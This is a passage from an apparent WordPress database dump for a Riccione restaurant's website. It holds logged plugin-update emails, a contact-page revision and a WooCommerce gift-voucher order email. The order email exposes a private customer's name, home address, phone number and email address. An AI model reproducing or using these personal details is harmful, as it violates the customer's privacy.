part.\n\n\nThese plugins are now up to date:\n- WooCommerce version 4.6.2\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-12','','','2020-11-06 01:24:08','2020-11-06 00:24:08','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-12/',0,'postman_sent_mail','',0),(1231,0,'2020-11-11 01:26:04','2020-11-11 00:26:04','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- WooCommerce version 4.7.0\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-13','','','2020-11-11 01:26:04','2020-11-11 00:26:04','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-13/',0,'postman_sent_mail','',0),(1232,0,'2020-11-11 01:26:04','2020-11-11 00:26:04','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- WooCommerce version 4.7.0\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-14','','','2020-11-11 01:26:04','2020-11-11 00:26:04','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-14/',0,'postman_sent_mail','',0),(1234,1,'2020-11-11 12:16:15','2020-11-11 11:16:15','Indirizzo: Viale D\'Annunzio, 190, 47838 Riccione RN\r\nTelefono: 0541 648528 (oppure 327 1935770 in caso di malfuzionamento linea)\r\nOrari: 12:30–14:00, 19:30–22:00\r\nEmail: info @ ristorantesolymar . it , oppure puoi utilizzare il modulo a fondo pagina\r\nGiorno di chiusura lunedì. Sono previste alcune eccezioni in caso di gruppi numerosi, fiere, festività o periodo determinati. Si consiglia sempre di telefonare prima.\r\n\r\n<iframe width=\"100%\" height=\"400\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"http://maps.google.it/maps?f=q&amp;source=s_q&amp;hl=it&amp;geocode=&amp;q=Sol+Y+Mar,+Riccione,+RN&amp;aq=0&amp;oq=ristorante+sol+y+&amp;sll=44.435505,10.985057&amp;sspn=2.286705,5.064697&amp;ie=UTF8&amp;hq=Sol+Y+Mar,&amp;hnear=Riccione,+Rimini,+Emilia-Romagna&amp;t=m&amp;cid=7306077362099112647&amp;ll=44.024545,12.631702&amp;spn=0.043201,0.11158&amp;z=13&amp;iwloc=A&amp;output=embed\"></iframe><br /><small><a href=\"http://maps.google.it/maps?f=q&amp;source=embed&amp;hl=it&amp;geocode=&amp;q=Sol+Y+Mar,+Riccione,+RN&amp;aq=0&amp;oq=ristorante+sol+y+&amp;sll=44.435505,10.985057&amp;sspn=2.286705,5.064697&amp;ie=UTF8&amp;hq=Sol+Y+Mar,&amp;hnear=Riccione,+Rimini,+Emilia-Romagna&amp;t=m&amp;cid=7306077362099112647&amp;ll=44.024545,12.631702&amp;spn=0.043201,0.11158&amp;z=13&amp;iwloc=A\" style=\"color:#0000FF;text-align:left\">Visualizzazione ingrandita della mappa</a></small>\r\n\r\nSiamo recensiti positivamente su TripAdvisor, Google+, <a href=\"http://www.baltazar.it/locali/italia/emilia-romagna/riccione/sol-y-mar-riccione/\" target=\"_blank\" rel=\"noopener noreferrer\">Baltazar</a> e tante altre guide online.','Contatti','','inherit','closed','closed','','28-revision-v1','','','2020-11-11 12:16:15','2020-11-11 11:16:15','',28,'https://www.ristorantesolymar.it/2020/11/11/28-revision-v1/',0,'revision','',0),(1235,0,'2020-11-16 13:23:00','2020-11-16 12:23:00','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Cookie and Consent Solution for the GDPR &amp; ePrivacy version 2.3.12\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-15','','','2020-11-16 13:23:00','2020-11-16 12:23:00','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-15/',0,'postman_sent_mail','',0),(1236,0,'2020-11-16 13:23:00','2020-11-16 12:23:00','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Cookie and Consent Solution for the GDPR &amp; ePrivacy version 2.3.12\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-16','','','2020-11-16 13:23:00','2020-11-16 12:23:00','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-16/',0,'postman_sent_mail','',0),(1237,0,'2020-11-17 13:28:07','2020-11-17 12:28:07','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Yoast SEO version 15.3\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-17','','','2020-11-17 13:28:07','2020-11-17 12:28:07','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-17/',0,'postman_sent_mail','',0),(1238,0,'2020-11-17 13:28:07','2020-11-17 12:28:07','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Yoast SEO version 15.3\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-18','','','2020-11-17 13:28:07','2020-11-17 12:28:07','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-18/',0,'postman_sent_mail','',0),(1239,0,'2020-11-19 13:28:44','2020-11-19 12:28:44','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue version 3.1.0\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-19','','','2020-11-19 13:28:44','2020-11-19 12:28:44','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-19/',0,'postman_sent_mail','',0),(1240,0,'2020-11-19 13:28:44','2020-11-19 12:28:44','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue version 3.1.0\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-20','','','2020-11-19 13:28:44','2020-11-19 12:28:44','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-20/',0,'postman_sent_mail','',0),(1241,0,'2020-11-20 13:22:58','2020-11-20 12:22:58','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- UpdraftPlus - Backup/Restore version 1.16.36\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-21','','','2020-11-20 13:22:58','2020-11-20 12:22:58','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-21/',0,'postman_sent_mail','',0),(1242,0,'2020-11-20 13:22:59','2020-11-20 12:22:59','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- UpdraftPlus - Backup/Restore version 1.16.36\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-22','','','2020-11-20 13:22:59','2020-11-20 12:22:59','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-22/',0,'postman_sent_mail','',0),(1243,0,'2020-11-21 01:24:06','2020-11-21 00:24:06','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Popup Builder version 3.69.6\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-23','','','2020-11-21 01:24:06','2020-11-21 00:24:06','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-23/',0,'postman_sent_mail','',0),(1244,0,'2020-11-21 01:24:06','2020-11-21 00:24:06','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Popup Builder version 3.69.6\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-24','','','2020-11-21 01:24:06','2020-11-21 00:24:06','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-24/',0,'postman_sent_mail','',0),(1245,0,'2020-11-24 01:22:37','2020-11-24 00:22:37','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- UpdraftPlus - Backup/Restore version 1.16.37\n- WooCommerce PayPal Checkout Gateway version 2.1.1\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-25','','','2020-11-24 01:22:37','2020-11-24 00:22:37','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-25/',0,'postman_sent_mail','',0),(1246,0,'2020-11-24 01:22:37','2020-11-24 00:22:37','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- UpdraftPlus - Backup/Restore version 1.16.37\n- WooCommerce PayPal Checkout Gateway version 2.1.1\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-26','','','2020-11-24 01:22:37','2020-11-24 00:22:37','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-26/',0,'postman_sent_mail','',0),(1247,0,'2020-11-25 01:22:34','2020-11-25 00:22:34','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Really Simple SSL version 4.0.0\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-27','','','2020-11-25 01:22:34','2020-11-25 00:22:34','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-27/',0,'postman_sent_mail','',0),(1248,0,'2020-11-25 01:22:34','2020-11-25 00:22:34','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Really Simple SSL version 4.0.0\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-28','','','2020-11-25 01:22:34','2020-11-25 00:22:34','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-28/',0,'postman_sent_mail','',0),(1249,0,'2020-11-25 13:24:50','2020-11-25 12:24:50','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Cookie and Consent Solution for the GDPR &amp; ePrivacy version 2.3.13\n- WooCommerce version 4.7.1\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-29','','','2020-11-25 13:24:50','2020-11-25 12:24:50','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-29/',0,'postman_sent_mail','',0),(1250,0,'2020-11-25 13:24:50','2020-11-25 12:24:50','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Cookie and Consent Solution for the GDPR &amp; ePrivacy version 2.3.13\n- WooCommerce version 4.7.1\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-30','','','2020-11-25 13:24:50','2020-11-25 12:24:50','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-30/',0,'postman_sent_mail','',0),(1251,0,'2020-11-26 01:22:37','2020-11-26 00:22:37','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Really Simple SSL version 4.0.1\n- UpdraftPlus - Backup/Restore version 1.16.40\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-31','','','2020-11-26 01:22:37','2020-11-26 00:22:37','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-31/',0,'postman_sent_mail','',0),(1252,0,'2020-11-26 01:22:37','2020-11-26 00:22:37','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Really Simple SSL version 4.0.1\n- UpdraftPlus - Backup/Restore version 1.16.40\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-32','','','2020-11-26 01:22:37','2020-11-26 00:22:37','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-32/',0,'postman_sent_mail','',0),(1253,0,'2020-11-26 13:24:47','2020-11-26 12:24:47','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Really Simple SSL version 4.0.2\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-33','','','2020-11-26 13:24:47','2020-11-26 12:24:47','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-33/',0,'postman_sent_mail','',0),(1254,0,'2020-11-26 13:24:47','2020-11-26 12:24:47','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Really Simple SSL version 4.0.2\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-34','','','2020-11-26 13:24:47','2020-11-26 12:24:47','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-34/',0,'postman_sent_mail','',0),(1255,0,'2020-11-27 13:23:21','2020-11-27 12:23:21','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Really Simple SSL version 4.0.3\n- UpdraftPlus - Backup/Restore version 1.16.41\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-35','','','2020-11-27 13:23:21','2020-11-27 12:23:21','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-35/',0,'postman_sent_mail','',0),(1256,0,'2020-11-27 13:23:21','2020-11-27 12:23:21','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Really Simple SSL version 4.0.3\n- UpdraftPlus - Backup/Restore version 1.16.41\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-36','','','2020-11-27 13:23:21','2020-11-27 12:23:21','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-36/',0,'postman_sent_mail','',0),(1257,1,'2020-11-28 15:27:39','2020-11-28 14:27:39','','Order &ndash; November 28, 2020 @ 03:27 PM','','wc-processing','open','closed','wc_order_iYfmldeWXmIyH','order-nov-28-2020-0227-pm','','','2020-11-28 15:28:11','2020-11-28 14:28:11','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=1257',0,'shop_order','',2),(1258,0,'2020-11-28 15:28:13','2020-11-28 14:28:13','\n\n	\n		\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	\n	\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5;margin: 0;padding: 70px 0;width: 100%\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd;border: 1px solid #dcdcdc;border-radius: 3px\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1;color: #ffffff;border-bottom: 0;font-weight: bold;line-height: 100%;vertical-align: middle;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;border-radius: 3px 3px 0 0\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 30px;font-weight: 300;line-height: 150%;margin: 0;text-align: left;color: #ffffff;background-color: inherit\'>Nuova prenotazione cliente</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px\">\n															<div id=\"body_content_inner\" style=\'color: #737373;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 14px;line-height: 150%;text-align: left\'>\n\n<p style=\"margin: 0 0 16px\">You’ve received the following order from Matteo Arlotti:</p>\n\n<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>\n	<a class=\"link\" href=\"https://www.ristorantesolymar.it/wp-admin/post.php?post=1257&amp;action=edit\" style=\"font-weight: normal;text-decoration: underline;color: #557da1\">[Order #1257]</a> (28 November 2020)</h2>\n\n<div style=\"margin-bottom: 40px\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;width: 100%;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Product</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Quantity</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Price</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		Buono Regalo (valore a scelta) (#coupon)<ul class=\"wc-item-meta\" style=\"font-size: small;margin: 1em 0 0;padding: 0\">\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">To:</strong> <p style=\"margin: 0\">Matteo Arlotti</p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">From:</strong> <p style=\"margin: 0\">Matteo Arlotti</p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">Message:</strong> <p style=\"margin: 0\">Cena delivery 28-11<br>\nViale Ugo Foscolo 27 - Rimini  47921<br>\n371 3930671</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			<span class=\"woocommerce-Price-amount amount\">58,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\">Subtotal:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\"><span class=\"woocommerce-Price-amount amount\">58,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Payment method:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Total:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\"><span class=\"woocommerce-Price-amount amount\">58,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%;vertical-align: top;margin-bottom: 40px;padding: 0\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;border: 0;padding: 0\">\n			<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>Billing address</h2>\n\n			<address class=\"address\" style=\"padding: 12px;color: #737373;border: 1px solid #e4e4e4\">\n				inclubitalia<br>Matteo Arlotti<br>Viale Ugo Foscolo 27<br>47921<br>Rimini<br>RIMINI									<br><a href=\"tel:3713930671\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">371 3930671</a>													<br>arlostaff@gmail.com							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px\">Congratulations on the sale.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- 